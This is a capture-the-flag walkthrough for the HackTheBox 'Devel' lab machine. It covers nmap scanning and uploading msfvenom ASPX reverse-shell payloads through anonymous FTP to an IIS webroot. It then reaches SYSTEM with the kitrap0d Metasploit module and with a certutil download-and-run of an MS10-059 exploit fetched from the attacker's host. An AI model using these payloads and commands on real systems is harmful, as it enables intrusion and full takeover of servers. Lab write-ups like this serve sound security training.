Hackthebox - Devel
Windows
Nmap
┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -p- --min-rate=1000 10.10.10.5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-26 10:58 EDT
Nmap scan report for 10.10.10.5
Host is up (0.028s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-25-22 08:20PM 2924 devel.aspx
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.38 secondsFTP
We are allowed to connect anonymously, when looking at the files listed on the nmap scan, it seems that these are the files available on the webserver. It seems like we can list directory Can we upload files and access them through the web server?
┌──(root💀kali)-[~]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> passive
Passive mode: on; fallback to active mode: on.
ftp> ls
229 Entering Extended Passive Mode (|||49210|)
150 Opening ASCII mode data connection.
03-18-17 01:06AM <DIR> aspnet_client
03-25-22 08:20PM 2924 devel.aspx
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.pngWe can create an hello.html file with just hello in it.
ftp> put hello.html
local: hello.html remote: hello.html
229 Entering Extended Passive Mode (|||49220|)
125 Data connection already open; Transfer starting.
100% |******************************************************************************************************************************************************************| 7 341.79 KiB/s --:-- ETA
226 Transfer complete.
7 bytes sent in 00:00 (0.28 KiB/s)We can see it in the browser
This means we could try to execute code, as this is a windows webserver we need a shell compatible with windows.
Initial foothold with Meterpreter
Let's generate one with msfvenom
┌──(root💀kali)-[~/Documents/hackthebox/devel]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5555 -f aspx > meterpreter.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2874 bytesNow we need to launch metasploit to setup our listener
msf6 > use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost tun0set lport 5555exploit -j
We can get back to the ftp and put our exploit in there:
ftp> put meterpreter.aspx
local: meterpreter.aspx remote: meterpreter.aspx
229 Entering Extended Passive Mode (|||49221|)
125 Data connection already open; Transfer starting.
100% |******************************************************************************************************************************************************************| 2911 61.69 MiB/s --:-- ETA
226 Transfer complete.
2911 bytes sent in 00:00 (83.02 KiB/s)And now we can go to our webpage and access our exploit http://10.10.10.5/meterpreter.aspx
And we can see on out metasploit that we have a shell!
msf6 exploit(multi/handler) > [*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.8:5555 -> 10.10.10.5:49222 ) at 2022-03-26 11:49:12 -0400
sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows IIS APPPOOL\Web @ DEVEL 10.10.14.8:5555 -> 10.10.10.5:49222 (10.10.10.5)Let's interact with our session:
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > Let's see who we are:
meterpreter > getuid
Server username: IIS APPPOOL\WebLet's get info on our target machine:
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windowsEnumerate System
In meterpreter lets swhitch to a shell using
shellcommandsysteminfo
c:\>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 25/3/2022, 8:10:48 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.450 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.541 MB
Virtual Memory: In Use: 600 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 3
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::58c0:f1cf:abc6:bb9e
[03]: dead:beef::61ec:4277:9347:6901
[04]: dead:beef::58c0:f1cf:abc6:bb9eWe know we are on windows 7, the owner is babis and the hostname is devel
WinPeas does not work
Powershell does not work
We can see what exploit are suggested through meterpreter exploit suggester
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 40 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.Privilege escalation with Meterpreter
use exploit/windows/local/ms10_015_kitrap0dSet the session to the session you have on the target (mine is 7)
set session 7Set the lhost
set lhost tun0set the lport to a free port I am going to use 5556
set lport 5556exploit
And it worked
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMInitial foothold with netcat
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=5555 -f aspx > netcat.aspxWe put our file in the ftp
put netcat.aspxWe launch our listener and catch our shell by browsing to the file
rlwrap nc -lvp 5555
┌──(root💀kali)-[~/Documents/hackthebox/devel]
└─# rlwrap nc -lvp 5555
listening on [any] 5555 ...
10.10.10.5: inverse host lookup failed: Unknown host
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.5] 49239
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>Privesc without Meterpreter
If we go to C:\User\Public we have writing rights and we are able to download an exploit we can ty this one
first we download it in our attacking machine
Then we launch a python simple http server
python3 -m http.server 80And we can download it in our target
certutil.exe -urlcache -f http://10.10.14.8/MS10-059.exe exploit.exeWe launch a listener
rlwrap nc -lvp 5556We launch the exploit
exploit.exe 10.10.14.8 5556We get a shell as authority\system:
whoami nt authority\system
Flags
We can get the flags in their usual place (with a win cmd we can use type instead of cat):
The user one is here
cat c:\\Users\\babis\\Desktop\\user.txtThe root one is here
cat C:\\Users\\Administrator\\Desktop\\root.txt
Resources
As usual there is more than one way to do it :)
Resource about the exploit
Last updated